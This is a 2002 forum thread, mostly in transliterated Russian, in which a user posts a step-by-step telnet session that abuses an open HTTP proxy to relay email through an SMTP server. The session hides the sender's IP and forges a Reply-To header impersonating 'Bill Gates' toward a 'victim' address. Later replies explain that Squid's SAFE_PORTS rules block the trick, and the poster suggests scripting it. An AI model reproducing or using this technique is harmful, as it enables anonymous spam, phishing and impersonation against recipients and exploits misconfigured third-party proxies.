AKB Forums

Go Back   AKB Forums > Technical sections > Software Security
Home Register Blogs FAQ Members List Calendar Downloads Arcade Mark Forums Read

Software Security Discussing software security algorithms, tricks, vulnerabilities

Troubles when posting message? Click here! :: Проблемы с отправлением сообщения? Нажмите сюда!

Reply
 
LinkBack Thread Tools Display Modes
Old Sep 11, 2002, 18:58   #1
¡no pasaran!
 
dolphin's Avatar
 
Join Date: Mar 2002
Location: localhost
Posts: 538
Rep Power: 7
Reputation: 23
Send a message via ICQ to dolphin
Cool Anonymous mail via http proxy server

Nedavno ja obnarujil sposob otsylat' polnostju anonymnye pis'ma, to est' bez registracii IP otpravitelja cherez http proxy server (tested on squid). IP otpravitelja budet IP proxy servera. Esli proxy ne derjit logov to vychislit' optpravitelja nevozmojno.

vot, chto sobstvenno nujno sdelat:

~$ telnet some.proxy.server.net 3128
Connected to some.proxy.server.net (127.128.129.1).
Escape character is '^]'.
POST some.smtp.server.net[/i]:25/]http://some.smtp.server.net:25/ HTTP/1.0
Content-length: 4096

helo gago
mail from: gago@some.am
rcpt to: victim@lame.net
data
From: gago<gago@some.am>
To: victim<victim@lame.net>
Reply-To: "Bill Gates"<billy@microsoft.com>
Subject: Have fun



This letter will be sent anonymously!

blah-blah-blah....


.


^]

telnet> q
Connection closed.

-----------------------------------

gde:

some.proxy.server.net - proxy, cherez kotoryj budet posylatsja pis'mo

some.smtp.server.net - smtp server, kotoryj, naprimer, obslujivaet victim@lame.net ili ljuboj smtp server, kotoryj pozvolit relay.

gago@some.am - adres otpravitelja

victim@lame.net - adres poluchatelja

Rekomendacii:

Viderjat' pauzu posle "Content-length:", chtoby smtp server uspel rugnutsja na neponjatnye emu http headery.

4096 - chislo byte v pis'me, vkljuchaja headery, doljno xotja-by prevyshat' real'noe chislo byte.

Krome perechislennyx headerov posle "data" mojno vkjuchat' ljubye mail headery, ili ne ispol'zovat' nikakix

Dumaju budet neslojno napisat' script ili progu, kotoraja budet otsylat' pochtu takim obrazom.
__________________
[ que fors aus ne le sot riens nee ]
dolphin is offline   Reply With Quote Quote selected
Old Sep 11, 2002, 19:39   #2
 
Posts: n/a
Reputation:
Post

С нормально настроеным сквидом, который переадресует только хттп и фтп случается следующее..
==============================================
Napalm:~$ telnet 192.168.65.1 3128
Trying 192.168.65.1...
Connected to 192.168.65.1.
Escape character is '^]'.
POST http://napalm.never.land.am:25/ HTTP/1.0
Content-length: 4096

HTTP/1.0 403 Forbidden
Server: Squid/2.4.STABLE4
Mime-Version: 1.0
Date: Wed, 11 Sep 2002 10:28:10 GMT
Content-Type: text/html
Content-Length: 771
Expires: Wed, 11 Sep 2002 10:28:10 GMT
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from Proxy.Never.Land.AM
Proxy-Connection: close
ERROR: The requested URL could not be retrieved
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the URL:
<A HREF="http://napalm.never.land.am:25/">http://napalm.never.land.am:25/</A>
<P>
The following error was encountered:
<UL>
<LI>
<STRONG>
Access Denied.
</STRONG>
<P>

==============================================

А вообще идея отличная!
Good job!
  Reply With Quote Quote selected
Old Sep 11, 2002, 19:59   #3
¡no pasaran!
 
dolphin's Avatar
 
Join Date: Mar 2002
Location: localhost
Posts: 538
Rep Power: 7
Reputation: 23
Send a message via ICQ to dolphin
Post

stealth <<

hm.. tvoj proxy rugnulsja ne na sam zapros, a na IP, s kotorogo k nemu obratilis'. Tak on-by otreagiroval na ljuboj zapros. Prover' http_allow v squid.conf
__________________
[ que fors aus ne le sot riens nee ]
dolphin is offline   Reply With Quote Quote selected
Old Sep 11, 2002, 21:30   #4
Консервативный Демагог
 
VX's Avatar
 
Join Date: Jan 2002
Location: Кавказская Албания
Posts: 889
Rep Power: 7
Reputation: 10
Post

Quote:
Originally posted by DolphiN:
stealth <<

hm.. tvoj proxy rugnulsja ne na sam zapros, a na IP, s kotorogo k nemu obratilis'. Tak on-by otreagiroval na ljuboj zapros. Prover' http_allow v squid.conf
Dolphin v squide napisanno deny !SAFE_PORTS, vot.. ))
__________________
Праздник к нам приходит...

|^^^^^^^^^'''^\| ||\__
| ВОДКА-ВОДКА | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
VX is offline   Reply With Quote Quote selected
Old Sep 12, 2002, 02:06   #5
¡no pasaran!
 
dolphin's Avatar
 
Join Date: Mar 2002
Location: localhost
Posts: 538
Rep Power: 7
Reputation: 23
Send a message via ICQ to dolphin
Talking

vx << a ty otkuda znaesh'?

all << slovom eta shtuka proverena i rabotaet na proxy serverax, kotorye a) pozvoljajut konnectitsja k nim. b) pozvoljajut delat' zaprosy k nujnym vam smtp serveram i k ix 25-ym portam
__________________
[ que fors aus ne le sot riens nee ]
dolphin is offline   Reply With Quote Quote selected
Old Sep 12, 2002, 06:08   #6
 
Posts: n/a
Reputation:
Post

Долф, если ты конечно обратил внимание - запрос шёл на нереальный АЙПИ адрес, то есть логично, что запрос шёл так же с нереального ..
Неужели ты подумал, что я запретил доступ для своей внутренней сетки???
:-)))
  Reply With Quote Quote selected
Old Sep 12, 2002, 14:32   #7
¡no pasaran!
 
dolphin's Avatar
 
Join Date: Mar 2002
Location: localhost
Posts: 538
Rep Power: 7
Reputation: 23
Send a message via ICQ to dolphin
Post

vx >> "Dolphin v squide napisanno deny !SAFE_PORTS, vot.. ))"

stealth << ne znaju mojet i zaprretil
A na samom dele vx prav, tvoj proxy ne puskaet connectitsja k nestandartnym http portam, tak chto otkryvaj dostup k !SAFE_PORTS i vpered
__________________
[ que fors aus ne le sot riens nee ]
dolphin is offline   Reply With Quote Quote selected
Old Sep 12, 2002, 15:04   #8
Студент
 
Join Date: May 2002
Location: Armenia
Posts: 276
Rep Power: 7
Reputation: 10
Post

Moderator: Message byl stert iz-za offtpica
__________________
http://freenet.am/~getpaid
petar is offline   Reply With Quote Quote selected
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 21:32.


Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
This board was founded on September 29, 2001
Powered by Viper Internet

Affordable Web Hosting | ParevNet

Buy text link